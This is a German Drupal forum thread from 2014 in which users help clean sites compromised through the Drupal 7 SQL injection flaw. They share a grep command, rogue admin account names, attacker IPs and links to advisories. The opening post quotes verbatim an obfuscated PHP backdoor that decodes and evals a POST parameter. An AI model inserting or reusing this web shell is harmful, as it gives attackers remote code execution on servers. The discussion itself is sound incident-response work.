Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

(GELÖST) Website wurde gehackt... Was tun?

Eingetragen von gauwuzl (113)
am 24.10.2014 - 14:35 Uhr in
  • Allgemeines zu Drupal

Hallo, eine meiner Website wurde gehackt (und leider, nein es gibt dafür kein Backup)... In den PHP-Dateien (bis jetzt hautsächlich in den Modulen) wurde unzählige Male dieser Code ganz am Anfang eingebaut:

<?php
                                                                                                                                                                                                                                                               $sF
="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n57e83f'];if(isset($s22)){eval($s21($s22));}
?>
<?php

Kennt sich jemand aus. Gibt es eine Möglichkeit alle Dateien nach dieser Zeile automatisch zu durchsuchen? Manuell ist das der Mörderaufwand...
Ich habe den Core aktualisiert und alle Module (vor einer Woche als zum ersten Mal vom Hoster eine Warnung kam) dachte ich hatte alles bereinigt und nun sind schon wieder Files mit den obigen Code infiziert.

Was bedeutet der Code. Wo soll ich sonst noch suchen? Vielen Dank für die Hilfe (wieder mal)

LG
Michael

‹ Registrierungsmails erneut versenden (GELÖST) Website wurde gehackt... Was tun? ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Website wurde gehackt... Was tun?

Eingetragen von Patrick Schanen (515)
am 24.10.2014 - 15:05 Uhr

http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/

https://www.google.com/search?client=ubuntu&channel=fs&q=%24sF%3D%22PCT4BA6ODSE_%22%3B%24s21%3Dstrtolower%28%24sF[4].%24sF[5].%24sF[9].%24sF[10].%24sF[6].%24sF[3].%24sF[11].%24sF[8].%24sF[10].%24sF[1].%24sF[7].%24sF[8].%24sF[10]%29%3B%24s22%3D%24{strtoupper%28%24&ie=utf-8&oe=utf-8

http://drupal.stackexchange.com/questions/134738/my-drupal-was-hacked-re...

https://wordpress.org/support/topic/possible-hack-of-my-site

  • Anmelden oder Registrieren um Kommentare zu schreiben

xargs ...

Eingetragen von cirage (25)
am 24.10.2014 - 15:07 Uhr

Ich nehme an, dass du Commandline Zugriff hast: find /your/drupal/dir -name '*.php' | xargs -n 10 grep 'PCT4BA6ODSE'

Gruss & happy AntiHack
-- Beat

  • Anmelden oder Registrieren um Kommentare zu schreiben

ebenfalls gehackt ... !

Eingetragen von cirage (25)
am 24.10.2014 - 15:27 Uhr

Zur Info: ich wurde auch gehackt! Per Zufall habe ich bemerkt, dass die USER tabelle einer meiner Webseiten modifiziert wurde. Vermultich betrifft dies: "SA-CORE-2014-005 - Drupal core - SQL injection"

In dieser USER Tabelle habe ich neue Einträge gefunden: 'admin2' sowie 'admin122'. Zusätzlich wurde mein Administrator Account umbenannt! Diese sind meines Wissens nicht mit phpmyadmin eingefügt worden, da ich im Logfile keine entsprechenden Einträge gefunden habe und es sich um ein mehrstufiges Sicherheitsprinzip handelt.

Im Drupal Report von heute morgen: "Warning: file_put_contents(iapstst.php) [function.file-put-contents]: failed to open stream: Permission denied in eval() (Zeile 1 von /var/www/drupal/modules/php/php.module(80) : eval()'d code).

Gruss
-- Beat

  • Anmelden oder Registrieren um Kommentare zu schreiben

wow... vielen dank für die

Eingetragen von gauwuzl (113)
am 24.10.2014 - 16:08 Uhr

wow... vielen dank für die rasche antwort... Beat: heißt das, dass bei dir in der Datenbank in der Tabelle "users" Admin-Accounts eingerichtet waren?

  • Anmelden oder Registrieren um Kommentare zu schreiben

ja, richtig

Eingetragen von cirage (25)
am 24.10.2014 - 16:34 Uhr

Per Zufall wollte ich heute eine Frontseite eines Sportclubs aktualisieren und bemerkte, dass ich mich mit Drupal Administrator nicht mehr einloggen konnte - das machte mich stutzig, obschon ich mit fortgeschrittenem Alter etwas vergesslich werde ...

Mit dem MySQL Administrator konnte ich mich auf die DB connecten und habe mir die USER Tabelle angeschaut. Der Administrator war umbenannt und wie bereits geschrieben zwei neue User mit Administrator Rechten wurden zusätzlich eingefügt ('admin122' UID=99969 und 'admin2' UID=333333). Bei diesen neuen Usern war die Email nicht gesetzt und created Timestamp = 0 ...

Anhand Drupal Report und Apache Logfile habe ich kontrolliert, welche IP Adressen dafür verantwortlich waren: 118.113.157.88 und 118.113.158.xy. Anschliessend 118.113.157.* und 118.113.158.* sofort via TCP-Wrapper komplett ausgesperrt und anschliessend Drupal Update ausgeführt.

Gruss
-- Beat

  • Anmelden oder Registrieren um Kommentare zu schreiben

Danke für die Info... Also

Eingetragen von gauwuzl (113)
am 24.10.2014 - 16:57 Uhr

Danke für die Info...

Also ich habe jetzt mal alle infizierten Files mit den oben erwähnten Codes entfernt! In der DAtenbank habe ich in der User-Tabelle nichts gefunden...

Genügt das? Oder was sollte ich noch beachten bzw. wie sollte ich weiter vorgehen (Core und Plugins wurden wie gesagt aktualisiert... Passwörter wurden alle neu gesetzt)

Danke nochmals für eure Hilfe
Michael

  • Anmelden oder Registrieren um Kommentare zu schreiben

Link zur Sicherheitsmeldung

Eingetragen von C_Logemann (912)
am 25.10.2014 - 00:16 Uhr

Gefährliche Sicherheitslücke in Drupal 7: Dringend Patch einspielen oder auf Version 7.32 wechseln

  • Anmelden oder Registrieren um Kommentare zu schreiben

Gelöst: Habe alles

Eingetragen von gauwuzl (113)
am 29.10.2014 - 13:19 Uhr

Gelöst: Habe alles schadhaften Dateien bzw. Code entfernt und alle nötigen Sicherheitsupdates gemacht... Scheint gelöst zu sein und macht keine Probleme mehr....

Danke für eure Hilfe

  • Anmelden oder Registrieren um Kommentare zu schreiben

Wenn es so einfach wäre

Eingetragen von thespecter (63)
am 30.10.2014 - 09:53 Uhr

http://t3n.de/news/drupal-kritische-luecke-575379/
https://www.drupal.org/PSA-2014-003

  • Anmelden oder Registrieren um Kommentare zu schreiben

Jep das is noch nicht vorbei,

Eingetragen von donflow (35)
am 30.10.2014 - 11:07 Uhr

Jep das is noch nicht vorbei, habe auch Links dazu gepostet aber wurde wieder gelöscht, scheint hier nicht als wichtig betrachtet zu werden.

http://www.heise.de/security/meldung/Drupal-Luecke-mit-dramatischen-Folg...
http://www.zdnet.com/drupal-warns-unless-you-patched-within-seven-hours-...

  • Anmelden oder Registrieren um Kommentare zu schreiben

Hallo! Ich hätte gerne ein

Eingetragen von Brian (158)
am 30.10.2014 - 13:44 Uhr

Hallo!
Ich hätte gerne ein paar Infos und hoffe Ihr wisst mehr…

Woran kann ich sicher verifizieren das eine Seite kompromittiert ist?
In welcher Version war die Sicherheitslücke?

  • Anmelden oder Registrieren um Kommentare zu schreiben

Alle D7 Versionen bis 7.31

Eingetragen von thespecter (63)
am 30.10.2014 - 13:48 Uhr

Alle D7 Versionen bis 7.31

  • Anmelden oder Registrieren um Kommentare zu schreiben

Danke, und woran kann ich

Eingetragen von Brian (158)
am 30.10.2014 - 14:00 Uhr

Danke, und woran kann ich sicher verifizieren das eine Seite schon betroffen ist?

  • Anmelden oder Registrieren um Kommentare zu schreiben

Ihre Seite ist betroffen!

Eingetragen von ositoblanco (17)
am 12.11.2014 - 19:42 Uhr

Prinzipiell ist mittlerweile davon auszugehen, dass alle Drupal-Seiten mit Version 7.x < 7.32 betroffen sind, die nicht unmittelbar nach dem Bekanntwerden der Sicherheitslücke entsprechend aktualisiert wurden (es sei denn Ihre Seite ist nicht erreichbar, nicht auffindbar bzw. nicht Drupal 7).

Da Angriffe unter Umständen keine oder nur wenige Spuren hinterlassen können, gibt es keine Tools oder Experten, die Ihnen mit Sicherheit garantieren können nicht betroffen zu sein. Es gibt jedoch ein Tool, dass Ihnen ggf. Versichern kann, dass Sie betroffen sind, indem es Spuren von bekannten Angriffen sucht. Das Tool, welches einen Drush-Befehl zum Untersuchen Ihrer Seite bereitstellt, können Sie unter folgender Adresse finden: https://www.drupal.org/project/drupalgeddon. Dort gibt es auch weitere Informationen und Links zum Thema.

  • Anmelden oder Registrieren um Kommentare zu schreiben

Drupal 6 ist auch betroffen, wenn DBTNG-Modul im Einsatz

Eingetragen von C_Logemann (912)
am 12.11.2014 - 19:51 Uhr
ositoblanco schrieb

Prinzipiell ist mittlerweile davon auszugehen, dass alle Drupal-Seiten mit Version 7.x < 7.32 betroffen sind, die nicht unmittelbar nach dem Bekanntwerden der Sicherheitslücke entsprechend aktualisiert wurden (es sei denn Ihre Seite ist nicht erreichbar, nicht auffindbar bzw. nicht Drupal 7).

Vorsicht mit der Aussage "nicht Drupal 7": Drupal 6 ist auch betroffen, wenn DBTNG-Modul im Einsatz.

Auch hier im Drupalcenter gibt es Informationen zum Thema:

  • News: WARNUNG: Systeme (Drupal 7 und 6 mit DBTNG-Modul), die nicht am 15.10. innerhalb von 3 Stunden gepatcht wurden, sind evtl. infiltriert!
  • Wichtigster Thread: SQL Injection – Drupal 7.31 User "drupaldev" mit der Rolle "megauser"
  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • für drupal11 ein Slider Modul
  • [gelöst] W3CSS Paragraphs Views
  • Drupal 11 neu aufsetzen und Bereiche aus 10 importieren
  • Wie erlaubt man neuen Benutzern auf die Resetseite zugreifen zu dürfen.
  • [gelöst] Anzeigeformat Text mit Bild in einem Artikel, Drupal 11
  • Social Media Buttons um Insteragram erweitern
  • Nach Installation der neuesten D10-Version kein Zugriff auf Website
  • Composer nach Umzug
  • [gelöst] Taxonomie Begriffe zeigt nicht alle Nodes an
  • Drupal 11 + Experience Builder (Canvas) + Layout Builder
  • Welche KI verwendet ihr?
  • Update Manger läst sich nicht Installieren
Weiter

Neue Kommentare

  • melde mich mal wieder, da ich
    vor 1 Tag 10 Stunden
  • Hey danke
    vor 2 Tagen 5 Stunden
  • Update: jetzt gibt's ein
    vor 2 Tagen 23 Stunden
  • Hallo, im Prinzip habe ich
    vor 1 Woche 8 Stunden
  • Da scheint die Terminologie
    vor 1 Woche 11 Stunden
  • Kannst doch auch alles direkt
    vor 1 Woche 4 Tagen
  • In der entsprechenden View
    vor 1 Woche 4 Tagen
  • Dazu müsstest Du vermutlich
    vor 1 Woche 4 Tagen
  • gelöst
    vor 4 Wochen 1 Tag
  • Ja natürlich. Dass ist etwas,
    vor 4 Wochen 2 Tagen

Statistik

Beiträge im Forum: 250233
Registrierte User: 20449

Neue User:

  • Mroppoofpaync
  • 4aficiona2
  • AppBuilder

» Alle User anzeigen

User nach Punkten sortiert:
wla9461
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3857
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 16 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association